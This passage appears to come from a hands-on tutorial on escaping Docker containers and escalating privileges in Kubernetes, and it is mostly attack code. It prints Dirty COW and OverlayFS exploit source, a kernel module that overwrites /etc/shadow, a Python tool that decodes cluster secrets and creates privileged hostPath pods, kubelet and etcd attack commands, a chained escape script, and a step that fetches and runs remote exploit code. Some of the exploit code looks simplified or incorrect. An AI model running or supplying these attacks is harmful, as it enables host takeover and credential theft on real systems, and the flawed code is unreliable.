                    interesting_files.append({
                        'path': full_path,
                        'type': item_type,
                        'perms': perms,
                        'owner': owner,
                        'group': group,
                        'size': stat_info.st_size,
                        'mtime': time.ctime(stat_info.st_mtime)
                    })
            except (PermissionError, FileNotFoundError):
                continue
    except (PermissionError, FileNotFoundError):
        pass
    
    return interesting_files

def check_for_escape_vectors(mount_points):
    """Check each mount point for potential escape vectors."""
    escape_vectors = []
    
    for mount in mount_points:
        # Check if this is a host filesystem mount
        if any(x in mount for x in ['/host', '/mnt', '/var/lib/docker']):
            escape_vectors.append(f"Potential host filesystem mounted at {mount}")
        
        # Check if docker socket is mounted
        if 'docker.sock' in mount:
            escape_vectors.append(f"Docker socket mounted at {mount}")
        
        # Check for device mounts
        if mount.startswith('/dev/'):
            escape_vectors.append(f"Device mounted at {mount}")
        
        # Check for proc filesystem
        if mount == '/proc':
            escape_vectors.append("Proc filesystem mounted")
    
    return escape_vectors

def get_mount_points():
    """Get all mount points in the container."""
    mount_points = []
    
    try:
        with open('/proc/mounts', 'r') as f:
            for line in f:
                parts = line.strip().split()
                if len(parts) >= 2:
                    mount_points.append(parts[1])
    except:
        pass
    
    return mount_points

def main():
    print("[+] Scanning for mount points...")
    mount_points = get_mount_points()
    print(f"[+] Found {len(mount_points)} mount points")
    
    print("[+] Checking for potential escape vectors...")
    escape_vectors = check_for_escape_vectors(mount_points)
    
    if escape_vectors:
        print("[!] Potential escape vectors found:")
        for vector in escape_vectors:
            print(f"  - {vector}")
    else:
        print("[+] No obvious escape vectors found in mount points")
    
    print("[+] Scanning for interesting files...")
    interesting_files = []
    
    for mount in mount_points:
        # Skip some virtual filesystems to avoid clutter
        if mount in ['/proc', '/sys', '/dev', '/run']:
            continue
        
        mount_files = scan_for_interesting_files(mount)
        interesting_files.extend(mount_files)
    
    if interesting_files:
        print(f"[!] Found {len(interesting_files)} interesting files:")
        for item in interesting_files[:20]:  # Show top 20 to avoid overwhelming output
            print(f"  - {item['type']}: {item['path']}")
            print(f"    Permissions: {item['perms']} ({item['owner']}:{item['group']})")
            print(f"    Size: {item['size']} bytes, Modified: {item['mtime']}")
            print()
        
        if len(interesting_files) > 20:
            print(f"  (and {len(interesting_files) - 20} more files)")
    else:
        print("[+] No interesting files found")

if __name__ == "__main__":
    main()

Hands-On Challenge #5: Volume Access Lab

Create containers with various volume configurations and explore escape techniques:

# Create a shared volume
docker volume create shared_vol

# Container 1: With shared volume
docker run -it --rm --name c1 -v shared_vol:/shared ubuntu:20.04 bash

# In Container 1, create a file in the shared volume
echo "This is a test file from Container 1" > /shared/test.txt

# Container 2: Also with the shared volume
docker run -it --rm --name c2 -v shared_vol:/shared ubuntu:20.04 bash

# In Container 2, verify you can see the file
cat /shared/test.txt

# Container 3: With host /proc mounted
docker run -it --rm --name c3 -v /proc:/host_proc ubuntu:20.04 bash

# Try to access host information via /proc
ls -la /host_proc/1/root/

Advanced Kernel Exploitation

At this level, we're exploiting vulnerabilities in the shared kernel to escape container isolation. This requires understanding kernel internals and exploit development.

The Dirty COW Exploit (CVE-2016-5195)

One of the most famous kernel vulnerabilities that allows container escapes:

// dirty_cow.c - CVE-2016-5195 exploit (simplified version)
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg) {
    char *str;
    str = (char *)arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n", c);
    return NULL;
}

void *procselfmemThread(void *arg) {
    char *str;
    str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, (off_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("write %d\n", c);
    close(f);
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 3) {
        fprintf(stderr, "Usage: %s target_file new_content\n", argv[0]);
        return 1;
    }
    
    pthread_t pth1, pth2;
    name = argv[1];
    
    // Open the target file
    f = open(name, O_RDONLY);
    if (f == -1) {
        perror("open");
        return 1;
    }
    
    // Get file size
    fstat(f, &st);
    
    // Map the file
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    
    // Create threads
    pthread_create(&pth1, NULL, madviseThread, argv[2]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    
    // Wait for threads to complete
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    
    return 0;
}

Using Dirty COW for Container Escape

# Compile the exploit inside the container
apt-get update && apt-get install -y build-essential
gcc -pthread dirty_cow.c -o dirty_cow

# Use it to modify a SUID binary on the host
# First, check if we can access any SUID binaries from the host
find /proc/1/root -perm -4000 -type f 2>/dev/null

# If found, use Dirty COW to modify it
./dirty_cow /proc/1/root/usr/bin/some_suid_binary '#!/bin/sh\ncp /proc/1/root/etc/shadow /tmp/shadow\nchmod 777 /tmp/shadow'

# Execute the SUID binary to trigger our payload
/usr/bin/some_suid_binary

The OverlayFS Vulnerability (CVE-2021-3493)

Recent vulnerability in Ubuntu's OverlayFS implementation:

// overlayfs.c - CVE-2021-3493
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>

// Payload to be executed when exploit succeeds
static const char *SHELL = 
    "#!/bin/bash\n"
    "cat /etc/shadow > /tmp/shadow\n"
    "chmod 777 /tmp/shadow\n"
    "bash -i\n";

static void setup_sandbox(void) {
    const unsigned mount_flags = MS_NOSUID | MS_NODEV | MS_NOEXEC | MS_NOATIME;
    
    // Create a temporary directory for our mount point
    if (mkdir("/tmp/exploit", 0777) < 0 && errno != EEXIST)
        err(1, "mkdir(\"/tmp/exploit\")");
    
    // Mount it with overlayfs
    if (syscall(SYS_mount, "overlay", "/tmp/exploit", "overlay", mount_flags,
                "lowerdir=/tmp,upperdir=/tmp,workdir=/tmp") < 0)
        err(1, "mount(\"overlay\")");
}

static void exec_shell(void) {
    // Create a shell script
    int fd = open("/tmp/shell.sh", O_WRONLY | O_CREAT, 0777);
    if (fd < 0)
        err(1, "open(\"/tmp/shell.sh\")");
    
    // Write payload to shell script
    if (write(fd, SHELL, strlen(SHELL)) != strlen(SHELL))
        err(1, "write(\"/tmp/shell.sh\")");
    
    close(fd);
    
    // Execute our shell script
    char *const argv[] = {"/tmp/shell.sh", NULL};
    execve("/tmp/shell.sh", argv, NULL);
    err(1, "execve(\"/tmp/shell.sh\")");
}

int main(int argc, char *argv[]) {
    pid_t pid;
    int status;
    
    printf("[+] CVE-2021-3493 Ubuntu OverlayFS Container Escape\n");
    
    // Set up the sandbox environment
    setup_sandbox();
    
    // Fork a child process to handle the exploit
    pid = fork();
    if (pid == -1)
        err(1, "fork()");
    
    if (pid == 0) {
        // Child process
        exec_shell();
        exit(0);
    }
    
    // Parent process
    if (waitpid(pid, &status, 0) == -1)
        err(1, "waitpid()");
    
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        printf("[+] Exploit completed successfully\n");
    else
        printf("[-] Exploit failed\n");
    
    return 0;
}

Container Breakout via Kernel Module Loading

In privileged containers with CAP_SYS_MODULE:

// kernel_module_escape.c - Kernel module for container escape
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/namei.h>
#include <linux/fs.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Researcher");
MODULE_DESCRIPTION("Container Escape Demo");
MODULE_VERSION("0.1");

static int __init escape_init(void) {
    struct path path;
    struct file *file;
    loff_t pos = 0;
    int ret;
    char *payload = "root::0:0:root:/root:/bin/bash\n";
    
    printk(KERN_INFO "Container Escape: Initializing\n");
    
    // Locate the shadow file on the host
    ret = kern_path("/etc/shadow", 0, &path);
    if (ret) {
        printk(KERN_ERR "Container Escape: Failed to find /etc/shadow\n");
        return -1;
    }
    
    // Open the file for writing
    file = filp_open("/etc/shadow", O_WRONLY | O_CREAT, 0644);
    if (IS_ERR(file)) {
        printk(KERN_ERR "Container Escape: Failed to open /etc/shadow\n");
        path_put(&path);
        return PTR_ERR(file);
    }
    
    // Write to the file (reset root password)
    kernel_write(file, payload, strlen(payload), &pos);
    
    // Cleanup
    filp_close(file, NULL);
    path_put(&path);
    
    printk(KERN_INFO "Container Escape: Success! Root password has been reset.\n");
    return 0;
}

static void __exit escape_exit(void) {
    printk(KERN_INFO "Container Escape: Module unloaded\n");
}

module_init(escape_init);
module_exit(escape_exit);

Compile and load the module:

# Install dependencies
apt-get update && apt-get install -y build-essential linux-headers-$(uname -r)

# Create Makefile
cat > Makefile << EOF
obj-m += kernel_module_escape.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

# Compile the module
make

# Load the module to execute the escape
insmod kernel_module_escape.ko

# Remove the module
rmmod kernel_module_escape

eBPF for Container Escape

Using extended Berkeley Packet Filter (eBPF) for kernel exploitation:

// bpf_escape.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>

#define BPF_PROG_LOAD 5

static inline int bpf(int cmd, union bpf_attr *attr, unsigned int size) {
    return syscall(__NR_bpf, cmd, attr, size);
}

int main(int argc, char **argv) {
    union bpf_attr attr = { 0 };
    int prog_fd;
    
    // BPF program that attempts to access kernel memory
    struct bpf_insn prog[] = {
        // Load address of kernel symbol
        BPF_LD_IMM64(BPF_REG_1, 0xffffffff81000000), // Example kernel address
        // Read from the address
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),
        // Return
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };
    
    printf("[+] Attempting eBPF container escape...\n");
    
    // Prepare BPF program
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insns = (uint64_t)prog;
    attr.insn_cnt = sizeof(prog) / sizeof(struct bpf_insn);
    attr.license = (uint64_t)"GPL";
    
    // Load BPF program
    prog_fd = bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_fd < 0) {
        printf("[-] Failed to load BPF program: %s\n", strerror(errno));
        if (errno == EPERM) {
            printf("[-] Permission denied. Container might not have CAP_SYS_ADMIN capability.\n");
        }
        return 1;
    }
    
    printf("[+] BPF program loaded successfully. FD: %d\n", prog_fd);
    printf("[+] Container escape might be possible.\n");
    
    close(prog_fd);
    return 0;
}

Kernel Exploit Decision Tree

Do we have CAP_SYS_ADMIN?
├── Yes → Try cgroup release_agent
│   ├── Success → Full host access
│   └── Failure → Try loading kernel module
│       ├── Success → Full host access
│       └── Failure → Try eBPF exploit
└── No → Check kernel version for known vulnerabilities
    ├── Found vulnerable version → Use specific exploit (Dirty COW, OverlayFS)
    │   ├── Success → Full host access
    │   └── Failure → Try other kernel exploits
    └── No known vulnerabilities → Look for other container misconfigurations

Hands-On Challenge #6: Kernel Exploit Lab

WARNING: Only practice these exploits in isolated lab environments!

# Create a privileged container for testing kernel exploits
docker run -it --rm --privileged ubuntu:18.04 bash

# Inside the container, check kernel version
uname -a

# Install build tools
apt-get update && apt-get install -y build-essential

# Download and compile a suitable kernel exploit
# For example, the OverlayFS exploit for Ubuntu
wget https://raw.githubusercontent.com/briskets/CVE-2021-3493/main/exploit.c
gcc exploit.c -o exploit
./exploit

# Verify escape by checking if you can access host files
cat /etc/shadow  # Should be accessible after successful exploit

Kubernetes-Specific Attack Vectors

Kubernetes adds its own attack surface beyond standard container escapes. Let's explore how to pivot within a Kubernetes cluster after gaining initial access to a container.

Kubernetes Architecture Security Overview

Kubernetes components that are relevant for security:

  1. API Server: Central control plane
  2. etcd: Configuration storage
  3. Kubelet: Node agent
  4. Service Accounts: Identity within pods
  5. Network Policies: Traffic control
  6. RBAC: Access control system

Service Account Token Attacks

# Service account tokens are mounted by default
ls -l /var/run/secrets/kubernetes.io/serviceaccount/

# Store the token for use
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# Basic API access test
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Check what we can access
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -X POST -H "Content-Type: application/json" \
  -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'$NAMESPACE'"}}'

Creating a Privileged Pod

If we have permission to create pods:

# Create a privileged pod manifest
cat <<EOF > privpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privpod
  namespace: $NAMESPACE
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
  - name: privpod
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
EOF

# Create the pod
curl -k -X POST -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/yaml" \
  --data-binary @privpod.yaml \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Check if created
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privpod

Automated Kubernetes Privilege Escalation Tool

#!/usr/bin/env python3
# k8s_priv_esc.py - Kubernetes privilege escalation tool

import os
import json
import base64
import requests
import yaml
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class KubernetesExploit:
    def __init__(self):
        self.token_path = '/var/run/secrets/kubernetes.io/serviceaccount/token'
        self.namespace_path = '/var/run/secrets/kubernetes.io/serviceaccount/namespace'
        self.api_server = 'https://kubernetes.default.svc'
        self.token = None
        self.namespace = None
        self.permissions = None
    
    def initialize(self):
        """Initialize by reading service account details."""
        if not os.path.exists(self.token_path):
            print("[-] Service account token not found. Are you in a Kubernetes pod?")
            return False
        
        try:
            with open(self.token_path, 'r') as f:
                self.token = f.read().strip()
            
            with open(self.namespace_path, 'r') as f:
                self.namespace = f.read().strip()
            
            print(f"[+] Initialized with token for namespace: {self.namespace}")
            return True
        except Exception as e:
            print(f"[-] Initialization error: {e}")
            return False
    
    def api_request(self, path, method='GET', data=None, content_type='application/json'):
        """Make a request to the Kubernetes API."""
        url = f"{self.api_server}{path}"
        headers = {
            'Authorization': f'Bearer {self.token}',
            'Content-Type': content_type
        }
        
        try:
            if method == 'GET':
                response = requests.get(url, headers=headers, verify=False)
            elif method == 'POST':
                response = requests.post(url, headers=headers, data=data, verify=False)
            else:
                return None, f"Unsupported method: {method}"
            
            if response.status_code >= 200 and response.status_code < 300:
                return response.json(), None
            else:
                return None, f"API error: {response.status_code} - {response.text}"
        except Exception as e:
            return None, f"Request error: {e}"
    
    def check_api_access(self):
        """Check if we can access the Kubernetes API."""
        print("[*] Checking API access...")
        data, error = self.api_request('/api/v1/namespaces')
        
        if error:
            print(f"[-] API access failed: {error}")
            return False
        
        print("[+] Successfully connected to Kubernetes API")
        return True
    
    def check_permissions(self):
        """Check what permissions the service account has."""
        print("[*] Checking service account permissions...")
        
        review_data = json.dumps({
            "kind": "SelfSubjectRulesReview",
            "apiVersion": "authorization.k8s.io/v1",
            "spec": {
                "namespace": self.namespace
            }
        })
        
        data, error = self.api_request(
            '/apis/authorization.k8s.io/v1/selfsubjectrulesreviews',
            method='POST',
            data=review_data
        )
        
        if error:
            print(f"[-] Permission check failed: {error}")
            return False
        
        self.permissions = data
        
        # Check for dangerous permissions
        dangerous_perms = []
        
        if 'status' in data and 'resourceRules' in data['status']:
            for rule in data['status']['resourceRules']:
                resources = rule.get('resources', [])
                verbs = rule.get('verbs', [])
                
                # Check for pod creation
                if '*' in resources or 'pods' in resources:
                    if '*' in verbs or 'create' in verbs:
                        dangerous_perms.append("Pod creation")
                
                # Check for secret access
                if '*' in resources or 'secrets' in resources:
                    if '*' in verbs or 'get' in verbs or 'list' in verbs:
                        dangerous_perms.append("Secret access")
                
                # Check for node access
                if '*' in resources or 'nodes' in resources:
                    dangerous_perms.append("Node access")
                
                # Check for service account creation
                if '*' in resources or 'serviceaccounts' in resources:
                    if '*' in verbs or 'create' in verbs:
                        dangerous_perms.append("ServiceAccount creation")
        
        if dangerous_perms:
            print("[!] Dangerous permissions found:")
            for perm in dangerous_perms:
                print(f"  - {perm}")
        else:
            print("[+] No obviously dangerous permissions found")
        
        return True
    
    def list_secrets(self):
        """Try to list secrets in the namespace."""
        print("[*] Attempting to list secrets...")
        
        data, error = self.api_request(f'/api/v1/namespaces/{self.namespace}/secrets')
        
        if error:
            print(f"[-] Could not list secrets: {error}")
            return False
        
        if 'items' in data:
            print(f"[+] Found {len(data['items'])} secrets")
            for secret in data['items']:
                name = secret['metadata']['name']
                secret_type = secret['type']
                print(f"  - {name} (Type: {secret_type})")
                
                # Try to decode some common secret types
                if secret_type in ['Opaque', 'kubernetes.io/basic-auth']:
                    print("    Data:")
                    for key, value in secret['data'].items():
                        try:
                            decoded = base64.b64decode(value).decode('utf-8')
                            print(f"      {key}: {decoded}")
                        except:
                            print(f"      {key}: <binary data>")
        
        return True
    
    def create_privileged_pod(self):
        """Attempt to create a privileged pod."""
        print("[*] Attempting to create a privileged pod...")
        
        # Privileged pod manifest
        pod_manifest = {
            "apiVersion": "v1",
            "kind": "Pod",
            "metadata": {
                "name": "privilege-escalation-pod",
                "namespace": self.namespace
            },
            "spec": {
                "hostPID": True,
                "hostIPC": True,
                "hostNetwork": True,
                "containers": [{
                    "name": "privilege-escalation",
                    "image": "ubuntu:20.04",
                    "command": ["sleep", "infinity"],
                    "securityContext": {
                        "privileged": True
                    },
                    "volumeMounts": [{
                        "mountPath": "/host",
                        "name": "hostfs"
                    }]
                }],
                "volumes": [{
                    "name": "hostfs",
                    "hostPath": {
                        "path": "/"
                    }
                }]
            }
        }
        
        data, error = self.api_request(
            f'/api/v1/namespaces/{self.namespace}/pods',
            method='POST',
            data=json.dumps(pod_manifest)
        )
        
        if error:
            print(f"[-] Failed to create privileged pod: {error}")
            return False
        
        print("[+] Successfully created privileged pod 'privilege-escalation-pod'")
        print("[+] Access it with:")
        print(f"    kubectl exec -it -n {self.namespace} privilege-escalation-pod -- bash")
        return True
    
    def check_kubelet_api(self):
        """Try to access the kubelet API on nodes."""
        print("[*] Attempting to discover nodes for kubelet API access...")
        
        data, error = self.api_request('/api/v1/nodes')
        
        if error:
            print(f"[-] Could not list nodes: {error}")
            return False
        
        if 'items' in data:
            print(f"[+] Found {len(data['items'])} nodes")
            
            for node in data['items']:
                node_name = node['metadata']['name']
                addresses = node['status']['addresses']
                
                internal_ip = None
                for address in addresses:
                    if address['type'] == 'InternalIP':
                        internal_ip = address['address']
                        break
                
                if internal_ip:
                    print(f"  - Node: {node_name} (IP: {internal_ip})")
                    print(f"    Kubelet API might be accessible at: https://{internal_ip}:10250/")
                    print(f"    Try: curl -k https://{internal_ip}:10250/pods")
        
        return True
    
    def exploit(self):
        """Run through exploitation steps."""
        if not self.initialize():
            return
        
        if not self.check_api_access():
            return
        
        self.check_permissions()
        self.list_secrets()
        self.create_privileged_pod()
        self.check_kubelet_api()
        
        print("\n[+] Exploitation complete. Check results above for successful vectors.")

if __name__ == "__main__":
    exploiter = KubernetesExploit()
    exploiter.exploit()

Kubelet API Attacks

If kubelet's read-only port (10255) or authenticated port (10250) is accessible:

# Check if we can access kubelet API
curl -k https://NODE_IP:10250/pods

# If accessible, we can execute commands in other pods
curl -k -X POST "https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME" \
  -d "cmd=cat /etc/shadow"

# We can also run commands on the node via hostPath pods
# First create a pod with hostPath
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod
spec:
  containers:
  - name: busybox
    image: busybox
    command: ["sleep", "3600"]
    volumeMounts:
    - mountPath: /host
      name: hostpath
  volumes:
  - name: hostpath
    hostPath:
      path: /
EOF

# Then exec into it via kubelet
curl -k -X POST "https://NODE_IP:10250/run/default/hostpath-pod/busybox" \
  -d "cmd=cat /host/etc/shadow"

etcd Direct Access

If etcd is accessible:

# Check if etcd is accessible
curl -k https://ETCD_IP:2379/version

# List all keys
curl -k https://ETCD_IP:2379/v2/keys/?recursive=true

# Get specific secrets (like service account tokens)
curl -k https://ETCD_IP:2379/v2/keys/registry/secrets/kube-system/default-token-xyz

API Server Vulnerabilities

Exploiting API server misconfiguration:

# Anonymous access check
curl -k https://KUBERNETES_API_SERVER/api/v1/namespaces

# Check for unauthenticated access to pod exec
curl -k https://KUBERNETES_API_SERVER/api/v1/namespaces/default/pods/mypod/exec?command=ls&stdin=true&stdout=true&stderr=true

# Leverage aggregated API servers if available
curl -k https://KUBERNETES_API_SERVER/apis/metrics.k8s.io/v1beta1/nodes

Kubernetes Decision Tree

Do we have service account token?
├── Yes → Check permissions with SelfSubjectRulesReview
│   ├── Can create pods? → Create privileged pod
│   │   └── Success → Access host through privileged pod
│   ├── Can read secrets? → Gather service account tokens
│   │   └── Try more powerful service account token
│   ├── Can access nodes? → Check for kubelet API access
│   │   └── Run commands via kubelet API
│   └── Limited permissions → Look for RBAC misconfigurations
└── No → Check for NetworkPolicy gaps
    ├── Can access etcd? → Extract secrets from etcd
    ├── Can access kubelet? → Execute commands via kubelet
    └── Can access API aggregation layer? → Look for vulnerabilities

Hands-On Challenge #7: Kubernetes Privilege Escalation

Set up a local Kubernetes environment with Minikube and practice privilege escalation:

# Start Minikube with RBAC enabled
minikube start

# Create a pod with a vulnerable service account
kubectl create serviceaccount vulnerable-sa

# Create a role with excessive permissions
kubectl create role vulnerable-role \
  --verb=create,list,get \
  --resource=pods,secrets

# Bind the role to the service account
kubectl create rolebinding vulnerable-binding \
  --role=vulnerable-role \
  --serviceaccount=default:vulnerable-sa

# Create a pod using this service account
kubectl run vulnerable-pod \
  --image=ubuntu:20.04 \
  --command -- sleep infinity \
  --serviceaccount=vulnerable-sa

# Now practice the privilege escalation techniques within this pod
kubectl exec -it vulnerable-pod -- bash

Building Custom Escape Chains

Now let's combine multiple techniques to create sophisticated escape chains that work in hardened environments.

Container Escape Methodology

A systematic approach to container escape:

  1. Reconnaissance: Understand the environment
  2. Capability Analysis: Identify available privileges
  3. Vulnerability Identification: Find weaknesses
  4. Exploit Development: Build custom exploits
  5. Privilege Escalation: Gain higher privileges
  6. Persistence: Maintain access

Docker Socket + Kernel Exploit Chain

#!/bin/bash
# docker_kernel_chain.sh - Combined exploit chain

echo "[+] Starting container escape chain..."

# First, check if Docker socket is available
if [ -S /var/run/docker.sock ]; then
    echo "[+] Docker socket found, attempting primary escape vector"
    
    # Create a container with elevated privileges
    echo "[+] Creating privileged container"
    CONTAINER_ID=$(curl -s -X POST \
      --unix-socket /var/run/docker.sock \
      -H "Content-Type: application/json" \
      -d '{"Image":"ubuntu:20.04","Cmd":["/bin/sleep","infinity"],"Privileged":true}' \
      http://localhost/containers/create | grep -o '"Id":"[^"]*' | cut -d':' -f2 | tr -d '"')
    
    if [ -z "$CONTAINER_ID" ]; then
        echo "[-] Failed to create container"
    else
        echo "[+] Container created: $CONTAINER_ID"
        
        # Start the container
        echo "[+] Starting privileged container"
        curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          http://localhost/containers/$CONTAINER_ID/start
        
        # Execute command to prove host access
        echo "[+] Testing host access via privileged container"
        EXEC_ID=$(curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          -H "Content-Type: application/json" \
          -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/etc/shadow"]}' \
          http://localhost/containers/$CONTAINER_ID/exec | grep -o '"Id":"[^"]*' | cut -d':' -f2 | tr -d '"')
        
        echo "[+] Executing command in privileged container"
        curl -s -X POST \
          --unix-socket /var/run/docker.sock \
          -H "Content-Type: application/json" \
          -d '{"Detach":false,"Tty":false}' \
          http://localhost/exec/$EXEC_ID/start
        
        echo "[+] Cleanup: removing container"
        curl -s -X DELETE \
          --unix-socket /var/run/docker.sock \
          http://localhost/containers/$CONTAINER_ID?force=true
        
        echo "[+] Primary escape vector successful"
        exit 0
    fi
else
    echo "[-] Docker socket not found"
fi

# Secondary vector: CVE-2021-3493 OverlayFS (Ubuntu)
echo "[+] Attempting secondary escape vector: OverlayFS vulnerability"

# Check if we're on a vulnerable Ubuntu version
if grep -q "Ubuntu" /etc/os-release && grep -q "20.04\|18.04\|16.04" /etc/os-release; then
    echo "[+] Potentially vulnerable Ubuntu version found"
    
    # Create exploit code
    cat > /tmp/overlayfs_exploit.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>

static void setup_sandbox(void) {
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0)
        err(1, "unshare()");
}

static void exec_shell(void) {
    char *const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
    err(1, "execve()");
}

int main(int argc, char *argv[]) {
    printf("[+] CVE-2021-3493 OverlayFS Exploit\n");
    
    setup_sandbox();
    
    pid_t pid = fork();
    if (pid == -1)
        err(1, "fork()");
    
    if (pid == 0) {
        exec_shell();
        exit(0);
    }
    
    waitpid(pid, NULL, 0);
    return 0;
}
EOF
    
    # Compile and run exploit
    echo "[+] Compiling OverlayFS exploit"
    gcc -o /tmp/overlayfs_exploit /tmp/overlayfs_exploit.c
    
    echo "[+] Running exploit"
    /tmp/overlayfs_exploit
    
    if [ $? -eq 0 ]; then
        echo "[+] Exploit appears successful"
        # Try to access host shadow file
        if cat /etc/shadow 2>/dev/null; then
            echo "[+] Secondary escape vector successful"
            exit 0
        else
            echo "[-] Could not confirm host access"
        fi
    else
        echo "[-] Exploit failed"
    fi
else
    echo "[-] Not running on a vulnerable Ubuntu version"
fi

# Tertiary vector: Dirty COW (older kernels)
echo "[+] Attempting tertiary escape vector: Dirty COW"

# Check kernel version
KERNEL_VERSION=$(uname -r)
echo "[+] Kernel version: $KERNEL_VERSION"

if [[ "$KERNEL_VERSION" =~ ^3\. || "$KERNEL_VERSION" =~ ^4\.[0-8] ]]; then
    echo "[+] Potentially vulnerable kernel version found"
    
    # Create Dirty COW exploit
    cat > /tmp/dirty_cow.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg) {
    char *str;
    str = (char *)arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n", c);
    return NULL;
}

void *procselfmemThread(void *arg) {
    char *str;
    str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, (off_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("write %d\n", c);
    close(f);
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t pth1, pth2;
    struct stat st;
    int f = open("/etc/passwd", O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap: %p\n", map);
    
    char *new_passwd = "rootx::0:0:root:/root:/bin/bash\n";
    
    pthread_create(&pth1, NULL, madviseThread, NULL);
    pthread_create(&pth2, NULL, procselfmemThread, new_passwd);
    
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    
    return 0;
}
EOF
    
    # Compile and run exploit
    echo "[+] Compiling Dirty COW exploit"
    gcc -pthread -o /tmp/dirty_cow /tmp/dirty_cow.c
    
    echo "[+] Running exploit"
    /tmp/dirty_cow
    
    # Check if exploit worked
    if grep -q "rootx::" /etc/passwd; then
        echo "[+] Dirty COW exploit successful"
        echo "[+] Try to use: su - rootx"
        exit 0
    else
        echo "[-] Exploit failed or could not be verified"
    fi
else
    echo "[-] Kernel version not likely vulnerable to Dirty COW"
fi

echo "[-] All escape vectors failed"
exit 1

Multi-Stage Exploit Chain Methodology

When working with complex container environments, a single vulnerability often isn't enough. I use this methodology to chain multiple techniques:

  1. Identify all potential vulnerabilities through reconnaissance
  2. Prioritize exploits based on reliability and impact
  3. Prepare fallback methods if primary exploits fail
  4. Chain techniques that complement each other
  5. Maintain access once initial escape is achieved

Kubernetes Pod Spec + Service Account Chain

# kubernetes_chain.yaml - Multi-stage Kubernetes escape chain
apiVersion: v1
kind: Pod
metadata:
  name: escape-chain
  labels:
    app: escape-chain
spec:
  serviceAccountName: default  # Will be used for API access
  hostPID: true  # Step 1: Get host PID namespace
  hostIPC: true  # Step 2: Get host IPC namespace
  containers:
  - name: stage1
    image: ubuntu:20.04
    command: ["bash", "-c", "apt-get update && apt-get install -y curl jq && while true; do sleep 30; done"]
    securityContext:
      privileged: false  # Not privileged initially
    volumeMounts:
    - name: docker-socket  # Step 3: Mount Docker socket
      mountPath: /var/run/docker.sock
    - name: service-account  # Step 4: Access service account token
